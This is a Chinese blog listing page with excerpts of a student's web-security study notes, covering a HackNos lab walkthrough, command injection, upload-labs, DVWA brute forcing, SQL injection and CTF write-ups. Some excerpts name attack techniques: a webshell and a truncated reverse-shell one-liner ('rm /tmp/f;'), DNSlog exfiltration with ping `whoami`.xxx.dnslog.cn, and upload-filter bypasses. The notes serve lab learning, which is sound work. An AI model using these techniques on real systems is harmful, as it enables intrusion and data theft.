自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(16)
  • 收藏
  • 关注

原创 Os-HackNos-1靶机渗透过程笔记

用hackbar向webshell传递post参数(反弹shell的语句我还不太懂怎么写出来的,照搬的网上的语句)rm /tmp/f;在开始渗透前遇到nmap扫不到靶机ip的情况,查找资料后发现问题出在靶机的网关设置有问题,需要先修改interfaces文件中的网关才能使靶机联网(应该是都会遇到这个问题的)其中已知172为kali的ip,54为物理机ip,1为网关ip,故可知192.168.43.36是靶机的ip。查到漏洞CVE-2018-7600,影响范围包括了Drupal 6.x,7.x,8.x版本。

2023-04-02 22:34:30 159

原创 命令执行漏洞的学习笔记

dnslog是一个显示解析记录的平台,平台会分配给用户一个域名,假设为xxx.dnslog.cn,若存在命令执行漏洞,使用ping `whoami`.xxx.dnslog.cn命令,由于反引号的特性先解析whoami命令并返回值,在ping命令看来即是访问xxx.dnslog.cn的一个子域名,访问成功后dnslog平台将记录下用户对子域名的访问,即可知道`whoami`的值。4.0>&1:将标准输入定向到标准输出,即被攻击机反弹的shell对攻击机的输入,被重定向到标准输出,即显示器上。

2023-03-23 21:34:20 143

原创 开发学校一键打卡app(待完成)

我集中了前几个打卡界面的url,发现打卡界面的url后跟着几个get参数,其中UTp、Tx、ObjId(即学号)是固定不变的,但是.....最后的Id参数生成规则似乎是在前一天Id的基础上添加不规律的一个数, 这意味着我们无法通过程序语言设计提前计算确定我们当天需要进行打卡的界面的urlID。程序先获得当天的日期,得到"Id=" xxxxx " target=_self>"+"日期",前后两串字符串,通过进行比较匹配获得中间的id(xxxxx),即可进入当天的打卡界面。其次是登录成功后的打卡步骤。

2023-03-21 17:05:19 170

原创 upload-labs实战笔记(下)

(需要注意的是,该方法只对5.3以下版本的php有用,且必须在php.ini中关闭magic_quotes_gpc才可实现。本题先将文件上传至服务端,再判断后缀名,若不是白名单的再删除,由于$file_name就是原文件名,所以只需要发送一个jpg文件获得UPLOAD_PATH的值,就能知道发送文件的路径。打开cmd用以上语句将一张图片与一句话合成一个图片马文件,即可通过检测,另外,由于程序会根据文件头自动更改文件的后缀名,所以上传后直接访问文件服务器还是会将其当做图片文件处理的,php语句无法生效。

2023-03-16 21:02:04 61

原创 upload-labs通关笔记(上)

htaccess文件是apache独有的配置文件(.htaccess文件没有名字,只有后缀名),可以实现网页重定向、404错误页面自定义、允许/阻止特定的用户或者目录的访问、改变扩展名等功能,如果能够将.htaccess文件上传至服务器,.htaccess文件可以指定目录下某类文件被当做另一类文件解析。可知本题检查了$_FILES['file']['type']即文件的MIME类型,当文件上传请求发送时网页会将MIME类型写入http头中的content-type项,因此用bp抓包后修改即可。

2023-03-15 23:51:10 111

原创 DVWA实战笔记之暴力穷举

同时,如上图,密码爆破成功意味着宏的设置是正确的,宏确实都在更新获取token,但是其他错误密码的回显既有password incorrect,也有提示csrf攻击(即token不正确),难道获取token值也是有误差的吗?在bp中项目选项中的session(会议)选项中选择添加会话处理规则,选择宏生效的网站(注意,宏记录器中显示的是已经抓过包的页面,所以在设置宏之前需先进行一次抓包放包的操作)选择项目设置,选择到token的参数(不要忘记填写参数名称user_token)用bp抓包后发送至测试器。

2023-03-13 21:24:31 119

原创 [极客大挑战 2019]BuyFlagwp(burpsuite的使用与PHP弱类型比较)

在主要的menu中进入pay页面,根据显示的信息可以猜想是构造money参数发送获得flag,查看源码可知该网页需要检测post参数password,is_numeric()用于检测是否是数字或数字字符串,而下面又需参数与404相等,根据php的弱类型比较特性,弱类型比较时"12df"取前面的整数部分12,因此传入post参数404a即可绕过验证。利用burpsuite传参需要先抓包,将其传至Repeater,将http请求方式该为post,并在文件头中加一行Content-Type: ...

2021-09-14 19:03:17 146

原创 eval(Bugku)——PHP一些函数的用法

打开题目看到已显示源码以前在做文件包含题时,对include函数有一定的误解,这个函数将路径指向文件插入本PHP文件中,需要注意的是,include并非是将路径所指文件的源代码直接显示出来,而是将其插入php文件后,还要继续随着PHP文件的运行解析而被解析出来,其出现在网页上的内容是该文件解析过后的内容,如html文件源代码为<p>12334</p>,经过include插入代码运行解析后显示的是12334因此在进入该页面时发现flag.php中并没有该文件的显示结果,进入

2021-09-09 17:44:05 641

原创 命令/代码执行漏洞(待补充)

当网站提供执行用户某些命令(如ping)时,对管道符等没有进行严格的过滤,导致用户可以拼接一些非法命令使服务器执行。该题型的本质拼接非法命令使,如何绕过网站对管道符、空格、关键字的过滤。管道符:Windows系统:①|,直接执行后面语句 ②||,若前面语句为假则执行后面语句③&,若前面语句为假直接执行后面,为真执行前面后执行后面 ④&&,若前面为假则不执行后面Linux比Windows多一个’;’,执行完前面的执行后面常见命令:windows:Linux:

2021-08-31 01:59:52 83

原创 文件上传漏洞笔记(待补充)

该题型的本质就是将想办法将恶意文件上传至网站服务器,网站开发者会在前段后端设置各种过滤使非法文件无法上传,攻击者的任务就是寻找这些过滤方式的漏洞并绕过1.客户端检测绕过(js检测)主要是靠网页的js代码检测需要上传文件的后缀名可以通过禁用js或控制台修改网页的js代码,已经将上传文件后缀名改为合法后缀后通过burpsuite抓包修改2.服务端MIME检测绕过(Content-Type检测)检测Content-Type参数通过burpsuite抓包后修改Content-Type参数即可

2021-08-31 01:48:05 99

原创 BUUCTF web题笔记

Include点击tips出现根据题目名称include1猜测是文件包含漏洞文件包含漏洞常见的方法有:1.利用include()等函数,通过构造上传特定文件路径,绕过网站对参数的绕过,进入include函数,即可得到所需函数的源码,本题显然没有与include函数相关的线索2.php伪协议①php://input,php://input即获得未经过解析的post参数,此时即可通过构造相应的php文件代码,如一句话木马或system函数查询等方式发现网站对php:/..

2021-08-31 01:40:22 375

原创 攻防世界web进阶题(三)

Web_php_unserializeBase64_decode():对base64编码的数据进行解码die():exit()函数的别名@:添加该符后强行抑制错误信息Highlight_file():函数的参数若设置为’true’,则将文件高亮处理返回private:private属性序列化后将变成\x00类名\x00属性名,如DemofileO:+4:”Demo”:2:{s:10:”Demofile”;s:8:”fl4g.php”;}+4绕过preg_match,2绕过__

2021-08-31 01:31:01 113

原创 攻防世界web进阶题(二)

supersqli看题目得知是SQL注入题提交单引号报错,说明可能存在注入,单引号后加’--’,报错,说明网站已将其过滤,换#号,没报错,说明#注释符可用。加语句‘order by 2#未报错使用select时发现某些关键字被过滤,preg_match()函数作用为正则表达式匹配,’\.’中\为转义符,.在正则表达式中代表任一符号,转义后即代表本身。i代表匹配模式为大小写不敏感。因此需要将所用关键字绕过,使用union注入时发现大小写、注释、不等号等绕过方式都不行,因此考虑到堆叠

2021-08-31 01:27:32 190

原创 攻防世界web进阶题笔记(一)

Web_php_includeshow_source()(与highlight_file()函数作用相同)函数的作用是将括号中的PHP文件高亮显示,而_FILE_是PHP中的常量,代表本PHP文件的绝对路径,因此show_source(_FILE_)即将本PHP文件高亮显示strstr()函数:strstr($txt1,$txt2),查找txt2是否在txt1中存在,如果是则返回txt1中txt2及其后面的部分。因此while(strstr($page,"php://"))即查找$page.

2021-08-20 23:33:29 261

原创 SQL注入学习笔记

SQL注入漏洞产生的原因是数据库对用户上传的参数没有进行验证和过滤,导致其可以用特殊符号闭合等方式拼接SQL语句到数据库执行,从而得到数据库内部数据。union注入:当判定网站对特殊符号没有进行过滤时,可通过在参数后添加单引号等特殊符号将参数闭合,再使用union拼接相应的SQL语句,传入数据库中正常执行。只要拼接合适的SQL语句即可查询自己想要得到的信息。假设数据库中SQL语句为 select * from users where id='xxx'......,xxx为用户输入的数据,若将输入

2021-07-30 21:59:11 244

原创 攻防世界web新手题笔记

view-source:查看网页源代码,右键被禁止使用禁止鼠标的实现方法:document.onselectstart='return false'(禁止选中文字)oncontextmenu='return false'(禁止使用鼠标右键)解法1:在url前加view-source:解法2:控制台查看源代码(F12)解法3:Ctrl+U查看源代码2.robots协议:一般将robots.txt文件存至网站根目录下,声明其允许访问以及不允许访问的文件,User-age...

2021-07-22 01:24:33 314 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除